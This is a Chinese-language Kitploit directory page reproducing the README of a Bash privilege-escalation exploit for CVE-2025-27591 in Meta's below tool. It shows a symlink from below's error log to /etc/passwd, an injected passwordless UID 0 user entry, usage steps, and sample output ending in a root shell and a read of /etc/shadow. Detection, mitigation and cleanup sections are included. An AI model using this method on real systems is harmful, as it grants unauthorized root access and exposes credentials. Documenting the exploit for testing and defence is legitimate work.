Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Below-Logger-Symlink-Attack_CVE-2025-27591 — 一个基于 Bash 的权限提升漏洞利用工具,针对 `below` 系统性能监控工具。此改进版漏洞利用利用了日志机制中的符号链接漏洞,将 root 用户注入到 `/etc/passwd` 中,从而获得完全的 root 访问权限。 | Kitploit
工具/GitHubGitHub/0xdtc/below-logger-symlink-attack_cve-2025-27591
权限提升漏洞分析漏洞利用渗透测试学习与教育二进制利用
GitHub0xdtc/below-logger-symlink-attack_cve-2025-27591

Below-Logger-Symlink-Attack_CVE-2025-27591

一个基于 Bash 的权限提升漏洞利用工具,针对 `below` 系统性能监控工具。此改进版漏洞利用利用了日志机制中的符号链接漏洞,将 root 用户注入到 `/etc/passwd` 中,从而获得完全的 root 访问权限。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
2110个月前尚未审核

请我一份知识

CVE-2025-27591 漏洞利用 - Below 日志符号链接攻击

基于 Bash 的权限提升漏洞利用,针对 below 系统性能监控工具。此改进版漏洞利用日志机制中的符号链接漏洞,向 /etc/passwd 注入 root 用户,实现完全 root 访问。

致谢

由 SUSE 的 Matthias Gerstner 发现并报告 - 安全公告

漏洞详情

  • CVE: CVE-2025-27591
  • 影响组件: /usr/bin/below(Facebook 的系统性能监控器)
  • 影响版本: 日志目录为世界可写的 below 版本
  • 漏洞类型: 符号链接攻击 / 权限提升
  • 攻击向量: /var/log/below/error_root.log → /etc/passwd
  • CVSS 评分: 高(权限提升至 Root)

概述

below 监控工具在拥有提升权限时,会将错误记录到 /var/log/below/error_root.log。如果日志目录是世界可写的,攻击者可以:

  1. 创建从 error_root.log 指向 /etc/passwd 的符号链接
  2. 触发 below record 命令,将错误消息写入符号链接
  3. 手动注入一个 UID=0(root 权限)的恶意用户条目
  4. 使用新创建的用户生成 root shell

此漏洞利用自动执行整个过程,并配备智能回退机制,以应对不同的系统配置。

漏洞利用流程图

root@kitploit:~
flowchart TD
    A[开始漏洞利用] --> B[从用户获取用户名]
    B --> C{检查 /var/log/below<br/>是否世界可写?}
    C -->|否| D[退出:不受影响]
    C -->|是| E[删除已有的 error_root.log]
    E --> F[创建符号链接:<br/>error_root.log → /etc/passwd]
    F --> G{符号链接创建<br/>成功?}
    G -->|否| D
    G -->|是| H[执行:sudo below record]
    H --> I[等待 3 秒以记录日志]
    I --> J[终止 below 进程]
    J --> K{有效负载是否在<br/>/etc/passwd 中?}
    K -->|是| M[成功路径]
    K -->|否| L[尝试手动注入:<br/>echo 有效负载 >> 符号链接]
    L --> N{手动注入<br/>成功?}
    N -->|否| O[尝试回退:<br/>sudo tee -a]
    N -->|是| M
    O --> P{回退<br/>成功?}
    P -->|否| D
    P -->|是| M
    M --> Q[验证 /etc/passwd 中的有效负载]
    Q --> R[禁用清理陷阱]
    R --> S[执行:su 用户名]
    S --> T[获得 Root Shell]

    style A fill:#e1f5ff
    style T fill:#90EE90
    style D fill:#ffcccb
    style M fill:#98fb98

技术细节

利用步骤

  1. 预检查阶段

    • 确认 /var/log/below 目录存在
    • 检查目录是否具有世界可写权限(o+w)
    • 测试符号链接创建能力
  2. 设置阶段

    • 删除任何已有的 error_root.log 文件
    • 创建符号链接:/var/log/below/error_root.log → /etc/passwd
    • 确认符号链接指向正确的目标
  3. 注入阶段(主要方法)

    • 在后台执行 sudo below record
    • 允许进程运行 3 秒以触发错误记录
    • 终止进程以防止持续记录
    • 检查错误消息是否以有用方式破坏了 /etc/passwd
  4. 注入阶段(回退方法)

    • 方法 1:通过符号链接直接追加(echo >> 符号链接)
    • 方法 2:使用 sudo 配合 tee(sudo tee -a)
  5. Shell 生成阶段

    • 验证恶意用户存在于 /etc/passwd 中
    • 禁用清理陷阱以防止移除
    • 执行 su <用户名> 以获取 root shell

有效负载结构

注入的 /etc/passwd 条目格式如下:

root@kitploit:~
用户名::0:0:用户名:/root:/bin/bash

字段说明:

  • 用户名:用户提供的用户名(默认:"0xdtc")
  • :::空密码字段(无需密码)
  • 0:0:UID=0, GID=0(root 权限)
  • 用户名:GECOS 字段(用户描述)
  • /root:家目录
  • /bin/bash:登录 shell

先决条件

  • 目标系统运行存在漏洞的 below 二进制文件
  • /var/log/below 目录必须是世界可写的
  • 用户必须拥有执行 below record 的 sudo 权限
  • Bash shell 环境

使用方法

基本执行

root@kitploit:~
# 使脚本可执行
chmod +x CVE-2025-27591

# 运行漏洞利用程序
./CVE-2025-27591

交互提示

root@kitploit:~
========================================
  CVE-2025-27591 漏洞利用 (Bash)
========================================

[*] 此漏洞将在 /etc/passwd 中创建一个新的 root 用户
[?] 为新 root 用户输入用户名(默认:0xdtc):myuser
[+] 使用用户名:myuser

示例输出

root@kitploit:~
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
  CVE-2025-27591 漏洞利用 (Bash)
========================================

[*] 此漏洞将在 /etc/passwd 中创建一个新的 root 用户
[?] 为新 root 用户输入用户名(默认:0xdtc):0xdtc
[+] 使用用户名:0xdtc

[*] 检查 CVE-2025-27591 漏洞
[+] /var/log/below 是世界可写的
[*] 测试符号链接创建
[+] 符号链接测试成功
[+] 目标存在漏洞

[*] 开始利用
[+] 有效负载已写入 /tmp/exploit_payload
[*] 创建符号链接:/var/log/below/error_root.log -> /etc/passwd
[+] 符号链接已创建
[*] 执行 'sudo below record' 以触发记录
[*] 已启动 'below record',PID:12345
[*] 检查有效负载是否已写入
[*] 尝试手动注入
[*] 通过符号链接将有效负载追加到 /etc/passwd
[+] 有效负载已追加
[+] 利用完成!有效负载在 /etc/passwd 中
[*] 通过 'su 0xdtc' 生成 root shell
[*] 密码应为空,直接按 Enter

root@kali:/tmp# whoami
root

功能特性

智能阻塞处理

脚本包含多个回退机制,以应对不同的系统配置:

  1. 已有文件处理

    • 自动检测并删除已有日志文件
    • 处理普通文件和已有符号链接
    • 在继续前验证符号链接目标
  2. 多种注入方法

    • 主要方法:通过 below record 错误记录触发
    • 回退方法 1:直接追加到符号链接
    • 回退方法 2:使用 sudo tee 进行特权写入
  3. 进程管理

    • 自动终止挂起的 below 进程
    • 防止资源耗尽
    • 处理失败时的进程清理
  4. 重复运行检测

    • 检查有效负载是否已存在于 /etc/passwd
    • 如果用户已创建,则跳过利用
    • 重复运行时直接生成 shell

代码质量特性

  • 全面注释:每个函数和关键步骤均有文档记录
  • 章节标题:代码按逻辑部分组织
  • 错误处理:适当的错误检查和用户反馈
  • 干净退出:失败时通过陷阱处理器进行优雅清理
  • 最小依赖:纯 Bash,使用标准 Unix 工具

文件结构

root@kitploit:~
.
├── CVE-2025-27591           # 主要利用脚本
├── README.md                # 本文档
└── /tmp/exploit_payload     # 临时有效负载文件(运行时创建)

验证

成功利用后,验证 root 访问:

root@kitploit:~
# 检查当前用户
root@target:/tmp# whoami
root

# 检查用户 ID 和组
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

# 验证 /etc/passwd 中的用户
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash

# 读取仅 root 可读的文件
root@target:/tmp# cat /etc/shadow
[... shadow 文件内容 ...]

清理

如果需要在测试后移除恶意用户:

root@kitploit:~
# 从 /etc/passwd 中删除注入的用户
sudo sed -i '/^用户名:/d' /etc/passwd

# 删除任何遗留的符号链接
rm -f /var/log/below/error_root.log

将 用户名 替换为你在利用过程中使用的实际用户名。

检测与缓解

检测方法

  1. 文件完整性监控

    root@kitploit:~
    # 监控 /etc/passwd 的未授权更改
    aide --check
    
  2. 符号链接检测

    root@kitploit:~
    # 检查日志目录中的可疑符号链接
    find /var/log -type l -ls
    
  3. 审计日志

    root@kitploit:~
    # 检查可疑的 sudo 使用情况
    grep "below record" /var/log/auth.log
    

缓解策略

  1. 修复目录权限

    root@kitploit:~
    # 移除日志目录的世界可写权限
    sudo chmod 755 /var/log/below
    
  2. AppArmor/SELinux 策略

    • 实施强制访问控制
    • 限制 below 二进制文件可写入的位置
  3. 更新 Below

    • 应用 Facebook/Meta 的安全补丁
    • 使用包管理器更新
  4. 监控 /etc/passwd

    • 设置文件完整性监控(AIDE, Tripwire)
    • 对 UID=0 用户添加发出警报

法律免责声明

本漏洞利用仅用于教育目的和授权的渗透测试。

未经授权访问计算机系统是非法的。仅在你拥有明确许可进行安全测试的系统上使用此工具。作者对误用此工具不承担任何责任。

使用此漏洞即表示你承认:

  • 拥有测试目标系统的适当授权
  • 了解适用的法律法规
  • 对自己的行为承担全部责任

仓库:https://github.com/0xDTC/ 作者:Divine Clown (0xDTC) 许可证:仅限教育用途 最后更新:2025-11-13

下载工具